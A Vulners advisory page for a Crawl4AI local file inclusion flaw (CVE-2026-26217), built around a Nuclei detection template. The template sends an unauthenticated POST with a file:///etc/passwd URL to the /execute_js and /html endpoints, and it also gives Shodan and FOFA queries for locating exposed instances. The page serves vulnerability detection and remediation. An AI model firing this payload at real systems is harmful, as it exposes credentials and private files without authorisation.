Crawl4AI < 0.8.0 - Local File Inclusion
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2026-26217 | 12 Feb 202615:33 | – | attackerkb | |
| CVE-2026-26217 | 12 Feb 202616:00 | – | circl | |
| Crawl4AI 路径遍历漏洞 | 12 Feb 202600:00 | – | cnnvd | |
| CVE-2026-26217 | 12 Feb 202615:33 | – | cve | |
| CVE-2026-26217 Crawl4AI < 0.8.0 Docker API Local File Inclusion via file URL Handling | 12 Feb 202615:33 | – | cvelist | |
| Crawl4AI Has Local File Inclusion in Docker API via file:// URLs | 16 Jan 202620:58 | – | github | |
| Crawl4AI Has Local File Inclusion in Docker API via file:// URLs | 16 Jan 202600:00 | – | gitlab | |
| CVE-2026-26217 | 12 Feb 202616:16 | – | nvd | |
| GHSA-VX9W-5CX4-9796 Crawl4AI Has Local File Inclusion in Docker API via file:// URLs | 16 Jan 202620:58 | – | osv | |
| PYSEC-2026-34 | 12 Feb 202616:16 | – | osv |
10
id: CVE-2026-26217
info:
name: Crawl4AI < 0.8.0 - Local File Inclusion
author: str4k3r
severity: critical
description: |
The Crawl4AI Docker API endpoints accepted arbitrary URL schemes without an allow-list. An unauthenticated request with a file:// URL could read local files. Fixed in 0.8.0, which restricts accepted URL schemes.
impact: |
Unauthenticated remote attackers can read sensitive files, exposing credentials, API keys, and internal application details.
remediation: |
Update to version 0.8.0 or later.
reference:
- https://github.com/unclecode/crawl4ai/security/advisories/GHSA-vx9w-5cx4-9796
classification:
cve-id: CVE-2026-26217
metadata:
verified: true
shodan-query: title:"Crawl4AI"
fofa-query: title="Crawl4AI"
tags: cve,cve2026,crawl4ai,lfi,file-read
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "crawl4ai")'
internal: true
- method: POST
path:
- "{{BaseURL}}/execute_js"
- "{{BaseURL}}/html"
headers:
Content-Type: application/json
body: '{"url": "file:///etc/passwd", "scripts": ["document.body.innerText"]}'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022061a597beed358f09ea08ed64fd017696673f58e046d2cf1b25236e0ce1a9ff91022100daf3fb6ee2a739382ba171ddd009ff89e9255b719d0b190b0ac127392448fe03:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Aug 2026 23:48Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.17.5 - 8.6
CVSS 49.2
EPSS0.00609
SSVC